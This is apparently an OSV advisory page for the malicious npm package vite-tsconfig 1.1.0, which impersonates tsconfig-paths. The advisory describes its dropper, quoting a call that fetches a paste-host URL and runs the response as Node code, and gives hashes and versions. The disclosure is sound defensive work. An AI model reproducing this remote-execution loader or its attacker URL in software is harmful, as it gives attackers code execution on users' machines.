MAL-2026-5576

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-tsconfig/MAL-2026-5576.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5576

Published

2026-06-11T05:21:54Z

Modified

2026-06-11T05:46:32.643797259Z

Summary

Malicious code in vite-tsconfig (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9)

The package is named vite-tsconfig and replicates the public API of the legitimate tsconfig-paths library (register, loadConfig, createMatchPath, matchFromAbsolutePaths), but adds an extra exported function configJson that is not present upstream. When a consumer calls configJson(), lib/config-loader.js spawns a detached, stdio-suppressed node lib/mapProps.js child process (child_process.spawn with detached:true and child.unref()). lib/mapProps.js then issues axios.get('https://www.jsonkeeper.com/b/5IZTJ') with header x-secret-key: _, takes response.data.Cookie, and executes it as JavaScript with full Node capability via new Function('require', s)(require) — retried up to 5 times. jsonkeeper.com is an anonymous public JSON paste host, so the executed payload is mutable and attacker-controlled, giving the publisher arbitrary remote code execution on any machine where a consumer invokes the documented configJson API. The remote URL is camouflaged as DEV_API_KEY inside a fake process.env shadow object, and the loader is wrapped in pino-logger-shaped config (messageKey/levels in lib/config-loader.js) to disguise the dropper. README references vite-json and dividab/tsconfig-paths, confirming the impersonation framing.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005599",
            "import_time": "2026-06-11T05:41:11.175888394Z",
            "sha256": "142b4a600291ebf355bb7915c082c34b329e58026dc3c1f181a5b1865c16cff9",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T05:21:54Z",
            "versions": [
                "1.1.0"
            ]
        }
    ]
}

References

https://www.npmjs.com/package/vite-tsconfig/v/1.1.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / vite-tsconfig

Package

Name: vite-tsconfig; View open source insights on deps.dev
Purl: pkg:npm/vite-tsconfig

Affected ranges

Affected versions

1.*

1.1.0

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "lib/mapProps.js",
            "sha256": "c3c20201b376f76b2f4c08ed64da39f703448f318f584f358007591ad3f9bcd0",
            "tlsh": "1c21124f757ca0a8017013f5a72be426f965643f300290d5739cc7a21f3655da182fde"
        },
        {
            "path": "lib/config-loader.js",
            "sha256": "94c1ab6d8ceb818c37f7cd023dcbf42d4e0513874b9ec3306f1f3b7ad9625c81",
            "tlsh": "5d81435b6ad4a9e600b19b64d62bd016ff702f77230680a2793cd1d41f39844a1e6efa"
        }
    ],
    "package_integrity": [
        {
            "filename": "vite-tsconfig-1.1.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-9KV5foA7sax35F5hcVBu8eAb5f1c+79CzQrV81Kktx7wrTF5Z7rOynTfHZf0T0Cb9qi9ghA9mr9AZwSLmNljWA==",
                "sha1": "d47d8cc3c868762e31da685a407b3f3d3c94b2e8"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-tsconfig/MAL-2026-5576.json"